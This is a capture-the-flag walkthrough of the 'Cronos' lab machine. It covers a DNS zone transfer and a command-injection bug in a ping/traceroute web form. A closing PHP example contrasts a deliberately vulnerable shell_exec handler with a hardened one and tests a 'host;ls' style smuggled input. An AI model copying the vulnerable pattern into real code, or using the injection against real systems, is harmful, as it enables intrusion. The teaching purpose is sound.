# Enumeration
The enumeration results show 3 open ports:

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So we are dealing with an Ubuntu machine hosting a web application. Port 53 is also open, with an ISC BIND service running. Let's look into it a little more.

[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.

I was having problems connecting to the web service, so I added the IP to the /etc/hosts file.

# DNS Enumeration

Check out the video from HackerSploit on DNS enumeration and zone transfers to understand the following lines.

$ dig axfr @ cronos.htb

; <<>> DiG 9.16.2-Debian <<>> axfr @ cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800    IN    NS    ns1.cronos.htb.
cronos.htb.        604800    IN    A
admin.cronos.htb.    604800    IN    A
ns1.cronos.htb.        604800    IN    A
www.cronos.htb.        604800    IN    A
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)

I have found a couple of domains linked to cronos. Let's add them to the /etc/hosts file too, in order to access them in the browser.

# Admin.cronos.htb & SQLi

A quick SQLi check lets us in.

Two tools are running on the welcome.php page: *ping* and *traceroute*. From Burp, I have poked the application and discovered command injection.

### Request

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1


I have encoded a semicolon and added the ls command for the current directory.
### Response

HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8

      <title>Net Tool v0.1 </title>
    <h1>Net Tool v0.1</h1>
    <form method="POST" action="">
    <select name="command">
        <option value="traceroute">traceroute</option>
        <option value="ping -c 1">ping</option>
    <input type="text" name="host" value=""/>
    <input type="submit" value="Execute!"/>
              <p><a href = "logout.php">Sign Out</a></p>
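The form above passes a chosen command and a user-supplied host to the shell. As an added example (not the box's real welcome.php, which is not shown here), the following reconstructs that vulnerable pattern next to a hardened handler that allowlists the command, validates the host and quotes the argument; the hostnames, function names and the `2>&1` redirect are assumptions, not taken from the machine.

```php
<?php
// Added example, not the Cronos box's actual welcome.php source.

// VULNERABLE: user input is concatenated straight into the command line.
// A shell metacharacter such as ";" in $host ends the ping/traceroute
// command and starts a second, attacker-chosen one.
function run_net_tool_vulnerable(string $command, string $host): string
{
    return (string) shell_exec($command . ' ' . $host);
}

// HARDENED: allowlist the command, validate the host, quote every argument.
function run_net_tool_hardened(string $command, string $host): string
{
    // Only the two tools the form offers, keyed by a short name so the
    // client never supplies the executable or its flags.
    $allowed = [
        'ping'       => ['ping', '-c', '1'],
        'traceroute' => ['traceroute'],
    ];
    if (!isset($allowed[$command])) {
        return 'Unknown command';
    }

    // Accept only a hostname made of RFC 1123 labels, or an IPv4/IPv6 literal.
    $label   = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    $is_host = (bool) preg_match('/^(?=.{1,253}$)(?:' . $label . '\.)*' . $label . '$/i', $host);
    $is_ip   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    if (!$is_host && !$is_ip) {
        return 'Invalid host';
    }

    // Build the command from individually quoted parts. escapeshellarg()
    // neutralises any remaining metacharacters even if the validation
    // above is loosened later; "2>&1" (assumed) captures tool errors too.
    $parts = array_map('escapeshellarg', array_merge($allowed[$command], [$host]));
    return (string) shell_exec(implode(' ', $parts) . ' 2>&1');
}

// Constructed inputs: the hardened handler rejects the "host;command"
// style value that the vulnerable one would execute.
echo run_net_tool_hardened('ping', '127.0.0.1'), PHP_EOL;   // ping output
echo run_net_tool_hardened('ping', '127.0.0.1;ls'), PHP_EOL; // Invalid host
echo run_net_tool_hardened('nc', '127.0.0.1'), PHP_EOL;      // Unknown command
```

Logging rejected inputs from the hardened path gives a simple detection signal for probing against the form.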
